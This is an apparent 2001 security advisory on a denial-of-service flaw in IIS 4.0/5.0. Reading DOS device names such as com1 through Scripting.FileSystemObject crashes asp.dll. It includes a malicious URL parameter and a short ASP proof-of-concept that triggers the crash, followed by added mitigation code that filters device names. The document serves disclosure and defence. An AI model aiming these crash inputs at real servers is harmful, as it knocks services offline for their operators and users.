Release Date: July 5, 2001
Severity:
High
Systems Affected:
Microsoft Windows NT 4.0 Internet Information Services 4.0
Microsoft Windows 2000 Internet Information Services 5.0
Description:
Opening and reading device files (com1, com2, etc.) using
Scripting.FileSystemObject will crash the ASP processor
(asp.dll).
Example:
1. Local exploit:
If you have permission to create an .asp file, you can crash
the ASP processor.
2. Remote exploit:
Sometimes a file name is passed as a parameter to an ASP
script, which opens and reads data from that file. Passing a
device file name as the parameter will crash the ASP processor.
http://host.int/scripts/script.asp?script=com1
3. ASP-Exploit:
<%
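Dim strFileName, objFSO, objFile
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
' A device name is used in place of a regular file name
strFileName = "com1"
Set objFile = objFSO.OpenTextFile(strFileName)
' Reading from the opened device is the step that crashes asp.dll
Response.Write objFile.ReadAll
objFile.Close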
%>
Solution
Fix Scripting.FileSystemObject (it has to check that the file
exists before opening it).
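Until the component itself is fixed, a script that takes a file name as a parameter (the remote case above) can refuse device names before they reach OpenTextFile. The following is an added example, not code from the advisory or from Microsoft; the function names and the "/data/" directory are hypothetical, and the "script" parameter is the one from the URL above.

```vbscript
<%
' Added example: application-side check, not part of the original advisory.
' True when the last path component is a DOS device name (CON, PRN, AUX, NUL,
' COM1-COM9, LPT1-LPT9), including forms such as "com1.txt", "COM1:", "dir\com1".
Function IsDeviceName(ByVal strName)
    Dim re
    Set re = New RegExp
    re.IgnoreCase = True
    re.Pattern = "(^|[\\/:])\s*(CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9])\s*([.:].*)?$"
    IsDeviceName = re.Test(strName)
End Function

' Returns an open TextStream, or Nothing when the name is rejected.
Function OpenRequestedFile(ByVal strParam)
    Dim objFSO, reAllow, strPath
    Set OpenRequestedFile = Nothing
    ' Allow-list: plain .txt file names only, so no separators or "..".
    Set reAllow = New RegExp
    reAllow.Pattern = "^[A-Za-z0-9_-]{1,64}\.txt$"
    If Not reAllow.Test(strParam) Then Exit Function
    ' "com1.txt" passes the allow-list, so the device check is still needed,
    ' and it runs before FileSystemObject ever sees the name.
    If IsDeviceName(strParam) Then Exit Function
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    strPath = Server.MapPath("/data/" & strParam)   ' hypothetical directory
    If Not objFSO.FileExists(strPath) Then Exit Function
    Set OpenRequestedFile = objFSO.OpenTextFile(strPath, 1)   ' 1 = ForReading
End Function

Dim objFile
Set objFile = OpenRequestedFile(CStr(Request.QueryString("script")))
If objFile Is Nothing Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid file name"
Else
    ' ReadAll raises an error on an empty file, so test for end of stream first.
    If Not objFile.AtEndOfStream Then
        Response.Write Server.HTMLEncode(objFile.ReadAll)
    End If
    objFile.Close
End If
%>
```

With this check, script.asp?script=com1 and script.asp?script=com1.txt both return 400 without FileSystemObject being called.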
Vendor Status:
Disclaimer
The information within this paper may change without
notice. Use of this information constitutes acceptance for
use in an AS IS condition. There are NO warranties with
regard to this information. In no event shall the author be
liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any
use of this information is at the user's own risk.
Hyperlinks
http://www.nerf.f2s.com/
Credits
Found by buggzy (buggzy@nerf.ru)
NERF Security gr0up (www.nerf.ru), Russia, 2001 (c)